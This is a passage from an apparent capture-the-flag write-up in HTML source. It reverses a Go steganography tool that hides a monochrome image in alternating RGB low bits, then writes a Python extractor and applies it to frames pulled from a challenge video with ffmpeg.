&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;comment&#34;&gt;// Open the input file&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	inputFile1, err := os.Open(*embedFileName)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;keyword&#34;&gt;if&lt;/span&gt; err != &lt;span class=&#34;literal&#34;&gt;nil&lt;/span&gt; &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;		&lt;span class=&#34;built_in&#34;&gt;panic&lt;/span&gt;(err)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;keyword&#34;&gt;defer&lt;/span&gt; inputFile1.Close()&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;comment&#34;&gt;// Decode the PNG image&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	inputImage1, _, err := image.Decode(inputFile1)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;keyword&#34;&gt;if&lt;/span&gt; err != &lt;span class=&#34;literal&#34;&gt;nil&lt;/span&gt; &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;		&lt;span class=&#34;built_in&#34;&gt;panic&lt;/span&gt;(err)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;comment&#34;&gt;// Check if the image is grayscale&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	grayImage, ok := inputImage1.(*image.Gray)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;keyword&#34;&gt;if&lt;/span&gt; !ok &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;		fmt.Println(&lt;span class=&#34;string&#34;&gt;&amp;quot;Error: input image is not grayscale&amp;quot;&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;		&lt;span class=&#34;keyword&#34;&gt;return&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;comment&#34;&gt;// Get the width and height of the image&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	embed_width := grayImage.Bounds().Size().X&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	embed_height := grayImage.Bounds().Size().Y&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;comment&#34;&gt;// Open the input file&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	inputFile, err := os.Open(*inputFileName)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;keyword&#34;&gt;if&lt;/span&gt; err != &lt;span class=&#34;literal&#34;&gt;nil&lt;/span&gt; &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;		&lt;span class=&#34;built_in&#34;&gt;panic&lt;/span&gt;(err)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;keyword&#34;&gt;defer&lt;/span&gt; inputFile.Close()&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;comment&#34;&gt;// Decode the image as a generic Image interface value&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	inputImage, _, err := image.Decode(inputFile)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;keyword&#34;&gt;if&lt;/span&gt; err != &lt;span class=&#34;literal&#34;&gt;nil&lt;/span&gt; &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;		&lt;span class=&#34;built_in&#34;&gt;panic&lt;/span&gt;(err)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;comment&#34;&gt;// Assert the image to an *image.RGBA or *image.NRGBA value&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	rgba, ok := inputImage.(*image.RGBA)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;keyword&#34;&gt;if&lt;/span&gt; !ok &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;		nrgba, ok := inputImage.(*image.NRGBA)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;		&lt;span class=&#34;keyword&#34;&gt;if&lt;/span&gt; !ok &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;			&lt;span class=&#34;built_in&#34;&gt;panic&lt;/span&gt;(&lt;span class=&#34;string&#34;&gt;&amp;quot;Input image format not supported&amp;quot;&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;		&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;		rgba = image.NewRGBA(nrgba.Bounds())&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;comment&#34;&gt;// Get the width and height of the image&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	bounds := rgba.Bounds()&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	width := bounds.Size().X&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	height := bounds.Size().Y&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	index:=&lt;span class=&#34;number&#34;&gt;0&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;keyword&#34;&gt;if&lt;/span&gt; width!=embed_width || height!=embed_height &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;		&lt;span class=&#34;built_in&#34;&gt;panic&lt;/span&gt;(&lt;span class=&#34;string&#34;&gt;&amp;quot;The Images are not in the same size!&amp;quot;&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;comment&#34;&gt;// Invert the colors of the image by subtracting each RGB component from 255&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; y := &lt;span class=&#34;number&#34;&gt;0&lt;/span&gt;; y &amp;lt; height; y++ &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;		&lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; x := &lt;span class=&#34;number&#34;&gt;0&lt;/span&gt;; x &amp;lt; width; x++ &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;			intensity := grayImage.GrayAt(x, y).Y &amp;amp; &lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;			i:=&lt;span class=&#34;type&#34;&gt;uint8&lt;/span&gt;(index%&lt;span class=&#34;number&#34;&gt;2&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;			data:= ((intensity &amp;lt;&amp;lt; i) | (&lt;span class=&#34;number&#34;&gt;254&lt;/span&gt;-i))&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;			r, g, b, a := rgba.At(x, y).RGBA()&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;			im_pix:= [&lt;span class=&#34;number&#34;&gt;3&lt;/span&gt;]&lt;span class=&#34;type&#34;&gt;uint8&lt;/span&gt;&amp;#123;&lt;span class=&#34;type&#34;&gt;uint8&lt;/span&gt;(r),&lt;span class=&#34;type&#34;&gt;uint8&lt;/span&gt;(g),&lt;span class=&#34;type&#34;&gt;uint8&lt;/span&gt;(b)&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;			j:= &lt;span class=&#34;type&#34;&gt;uint&lt;/span&gt;(index%&lt;span class=&#34;number&#34;&gt;3&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;			&lt;span class=&#34;keyword&#34;&gt;if&lt;/span&gt; intensity == &lt;span class=&#34;number&#34;&gt;1&lt;/span&gt; &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;				im_pix[j] = im_pix[j] | (data &amp;amp; (&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;+i))&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;			&amp;#125; &lt;span class=&#34;keyword&#34;&gt;else&lt;/span&gt; &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;				im_pix[j] = im_pix[j] &amp;amp; data&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;			&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;			newColor := color.RGBA&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;				R: &lt;span class=&#34;type&#34;&gt;uint8&lt;/span&gt;(im_pix[&lt;span class=&#34;number&#34;&gt;0&lt;/span&gt;]),&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;				G: &lt;span class=&#34;type&#34;&gt;uint8&lt;/span&gt;(im_pix[&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;]),&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;				B: &lt;span class=&#34;type&#34;&gt;uint8&lt;/span&gt;(im_pix[&lt;span class=&#34;number&#34;&gt;2&lt;/span&gt;]),&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;				A: &lt;span class=&#34;type&#34;&gt;uint8&lt;/span&gt;(a),&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;			&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;			rgba.SetRGBA(x, y, newColor)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;			index++&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;		&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;comment&#34;&gt;// Create the output file&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	outputFile, err := os.Create(*outputFileName)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;keyword&#34;&gt;if&lt;/span&gt; err != &lt;span class=&#34;literal&#34;&gt;nil&lt;/span&gt; &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;		&lt;span class=&#34;built_in&#34;&gt;panic&lt;/span&gt;(err)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;keyword&#34;&gt;defer&lt;/span&gt; outputFile.Close()&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;comment&#34;&gt;// Encode the output image as PNG&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;keyword&#34;&gt;if&lt;/span&gt; err := png.Encode(outputFile, rgba); err != &lt;span class=&#34;literal&#34;&gt;nil&lt;/span&gt; &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;		&lt;span class=&#34;built_in&#34;&gt;panic&lt;/span&gt;(err)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	fmt.Println(&lt;span class=&#34;string&#34;&gt;&amp;quot;Output image saved successfully&amp;quot;&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;As we see here this script try to hide image inside another image in a specific way. We need to understand how he hide data.&lt;/p&gt;
&lt;p&gt;The tool take a black-white image that have only 2 values in his pixels and try to inject this pixels in the LSB of RGB channels of the other image!&lt;br&gt;
But be carefull is not a traditional or simple LSB steganoraphy here! In each iteration it take a single channel. For example the 1st pixel will use the Red value, 2nd will use the Green value, 3rd will use the Blue and so on.&lt;/p&gt;
&lt;p&gt;We need to reverse this algorithm and write a script that can extract from images used by this tool.&lt;/p&gt;
&lt;p&gt;Let’s use this one!&lt;/p&gt;
&lt;figure class=&#34;highlight python&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;18&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;from&lt;/span&gt; PIL &lt;span class=&#34;keyword&#34;&gt;import&lt;/span&gt; Image&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;INPUT_FILFE=&lt;span class=&#34;string&#34;&gt;&amp;quot;input.png&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;EXTRACTED_DATA=&lt;span class=&#34;string&#34;&gt;&amp;quot;extracted.png&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;image=Image.&lt;span class=&#34;built_in&#34;&gt;open&lt;/span&gt;(INPUT_FILFE)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;image_data = image.load()&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;extracted = Image.new(&lt;span class=&#34;string&#34;&gt;&amp;#x27;1&amp;#x27;&lt;/span&gt;, (image.width,image.height), &lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;index=&lt;span class=&#34;number&#34;&gt;0&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;output_data=extracted.load()&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; j &lt;span class=&#34;keyword&#34;&gt;in&lt;/span&gt; &lt;span class=&#34;built_in&#34;&gt;range&lt;/span&gt;(image.height):&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; i &lt;span class=&#34;keyword&#34;&gt;in&lt;/span&gt; &lt;span class=&#34;built_in&#34;&gt;range&lt;/span&gt;(image.width):  &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        im_pix=&lt;span class=&#34;built_in&#34;&gt;list&lt;/span&gt;(image_data[i,j])&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        flag_pix = (im_pix[index%&lt;span class=&#34;number&#34;&gt;3&lt;/span&gt;]&amp;amp;(&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;+index%&lt;span class=&#34;number&#34;&gt;2&lt;/span&gt;)) &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;keyword&#34;&gt;if&lt;/span&gt; flag_pix &amp;gt;= &lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;:&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            flag_pix=&lt;span class=&#34;number&#34;&gt;255&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        output_data[i,j]=flag_pix&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        index+=&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;extracted.save(EXTRACTED_DATA)&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;To make sure that everything is ok now! We can use the given tool and hide a black-white image and try to extract it with our new script.&lt;/p&gt;
&lt;p&gt;We assume that everything is fine. Let’s take a look now how can we extract data from the video!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://github.com/4n6nk8s/quals-2023-write-ups/raw/main/Raf-Hide/video-gif.gif&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Let’s extract every frame from this video and try to extract a data from it using our last script. Maybe we will find something here!&lt;/p&gt;
&lt;h3 id=&#34;extract-all-the-frames-using-ffmpeg&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#extract-all-the-frames-using-ffmpeg&#34;&gt;#&lt;/a&gt; Extract all the frames using ffmpeg&lt;/h3&gt;
&lt;p&gt;After running this command. we get 383 frames.&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;raf@Securinets:~$ &lt;span class=&#34;built_in&#34;&gt;mkdir&lt;/span&gt; frames&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;raf@Securinets:~$ ffmpeg -i challenge.mp4 frames/%3d.png&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;h3 id=&#34;extract-data-from-each-frame-using-our-solver&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#extract-data-from-each-frame-using-our-solver&#34;&gt;#&lt;/a&gt; Extract data from each frame using our solver&lt;/h3&gt;
&lt;p&gt;Let’s use our solver to try extracting data from each frame.&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;raf@Securinets:~$ &lt;span class=&#34;built_in&#34;&gt;mkdir&lt;/span&gt; data&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;We will put our solver inside a function and use a for loop to run it on each frame&lt;/p&gt;
&lt;figure class=&#34;highlight python&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;18&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;19&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;20&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;def&lt;/span&gt; &lt;span class=&#34;title function_&#34;&gt;extract&lt;/span&gt;(&lt;span class=&#34;params&#34;&gt;frame,output&lt;/span&gt;):&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    image=Image.&lt;span class=&#34;built_in&#34;&gt;open&lt;/span&gt;(frame)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    image_data = image.load()&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    extracted = Image.new(&lt;span class=&#34;string&#34;&gt;&amp;#x27;1&amp;#x27;&lt;/span&gt;, (image.width,image.height), &lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    index=&lt;span class=&#34;number&#34;&gt;0&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    output_data=extracted.load()&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; j &lt;span class=&#34;keyword&#34;&gt;in&lt;/span&gt; &lt;span class=&#34;built_in&#34;&gt;range&lt;/span&gt;(image.height):&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; i &lt;span class=&#34;keyword&#34;&gt;in&lt;/span&gt; &lt;span class=&#34;built_in&#34;&gt;range&lt;/span&gt;(image.width):  &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            im_pix=&lt;span class=&#34;built_in&#34;&gt;list&lt;/span&gt;(image_data[i,j])&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            flag_pix = (im_pix[index%&lt;span class=&#34;number&#34;&gt;3&lt;/span&gt;]&amp;amp;(&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;+index%&lt;span class=&#34;number&#34;&gt;2&lt;/span&gt;)) &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            &lt;span class=&#34;keyword&#34;&gt;if&lt;/span&gt; flag_pix &amp;gt;= &lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;:&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;                flag_pix=&lt;span class=&#34;number&#34;&gt;255&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            output_data[i,j]=flag_pix&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            index+=&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    extracted.save(output)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; i &lt;span class=&#34;keyword&#34;&gt;in&lt;/span&gt; &lt;span class=&#34;built_in&#34;&gt;range&lt;/span&gt;(&lt;span class=&#34;number&#34;&gt;383&lt;/span&gt;):&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    index=&lt;span class=&#34;string&#34;&gt;&amp;quot;0&amp;quot;&lt;/span&gt;*(&lt;span class=&#34;number&#34;&gt;3&lt;/span&gt;-&lt;span class=&#34;built_in&#34;&gt;len&lt;/span&gt;(&lt;span class=&#34;built_in&#34;&gt;str&lt;/span&gt;(i+&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;)))+&lt;span class=&#34;built_in&#34;&gt;str&lt;/span&gt;(i+&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;)+&lt;span class=&#34;string&#34;&gt;&amp;quot;.png&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    extract(&lt;span class=&#34;string&#34;&gt;&amp;quot;frames/&amp;quot;&lt;/span&gt;+index,&lt;span class=&#34;string&#34;&gt;&amp;quot;data/&amp;quot;&lt;/span&gt;+index)&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Let’s now check the result and what we get!&lt;br&gt;
Of couse we will get 383 images. But is all the images are usefull or not? Let’s check.&lt;/p&gt;
&lt;p&gt;We find this image extracted from the 1st frame of the image!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://github.com/4n6nk8s/quals-2023-write-ups/raw/main/Raf-Hide/000.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
